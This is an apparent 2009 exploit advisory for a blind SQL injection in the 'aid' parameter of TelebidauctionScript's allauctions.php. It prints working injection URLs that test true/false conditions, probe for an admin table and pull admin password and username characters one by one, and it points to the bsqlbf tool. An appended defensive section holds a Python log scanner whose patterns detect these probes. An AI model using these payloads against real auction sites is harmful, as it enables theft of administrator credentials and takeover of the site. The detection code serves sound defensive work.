TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : darkangel_g85@Yahoo.com

____________________________________

Vendor : http://www.telebidauctionscript.com/

Demo :
_______

http://server/allauctions.php?aid=2+and+1=1 (true)

http://server/allauctions.php?aid=2+and+1=0 (false)

:: Table ::

http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1

:: column pass and username ::

http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1

http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1

note : Use the "bsqlbf" to write detailed information

Greetz
WwW.IQ-ty.CoM , Tryag.cc

| CraCkEr | Cyber-Zone | str0ke | jiko




Hussin X, 11/17/2009
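
Added example (not part of the original advisory, and not the vendor's code): a log check a defender could run to spot the true/false probing shown in the Demo section against the numeric aid parameter of allauctions.php. The log lines, client addresses, response sizes, rule names and the scan() function are constructed for illustration; a combined-format access log is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Nov/2009:10:00:01 +0000] "GET /allauctions.php?aid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Nov/2009:10:00:05 +0000] "GET /allauctions.php?aid=2+and+1=1 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Nov/2009:10:00:06 +0000] "GET /allauctions.php?aid=2+and+1=0 HTTP/1.1" 200 812
203.0.113.9 - - [17/Nov/2009:10:00:09 +0000] "GET /allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1 HTTP/1.1" 200 5120
198.51.100.7 - - [17/Nov/2009:10:00:12 +0000] "GET /allauctions.php?aid=17 HTTP/1.1" 200 4988
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')
# Hypothetical rule names; each matches one query shape listed in the advisory.
RULES = {
    "boolean-test": re.compile(r"\b(?:and|or)\b\s*\(?\s*\d+\s*=\s*\d+", re.I),
    "subquery": re.compile(r"\bselect\b.+\bfrom\b", re.I),
    "char-probe": re.compile(r"\bsubstr(?:ing)?\s*\(", re.I),
}

def scan(log_text, param="aid", script="allauctions.php"):
    """Return (findings, suspects) for requests whose `param` is not a plain integer."""
    findings, sizes = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, target, _status, size = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(script):
            continue
        # parse_qs decodes '+' and %xx, so rules see the value the script receives.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value.strip()):
                continue  # expected form: a numeric auction id
            hits = sorted(name for name, rx in RULES.items() if rx.search(value))
            findings.append((ip, value, hits or ["non-numeric"]))
            sizes[ip].add(int(size))
    # Blind injection reads the answer from differences between responses, so a
    # client whose flagged requests returned several body sizes is reviewed first.
    suspects = sorted(ip for ip, seen in sizes.items() if len(seen) > 1)
    return findings, suspects

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG)[0]:
        print(finding)
```

Any non-integer aid value in the log is already a signal, because the parameter is only ever a numeric id in normal use; the same integer-only check applied server-side before the query is built rejects every request shape listed above.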

				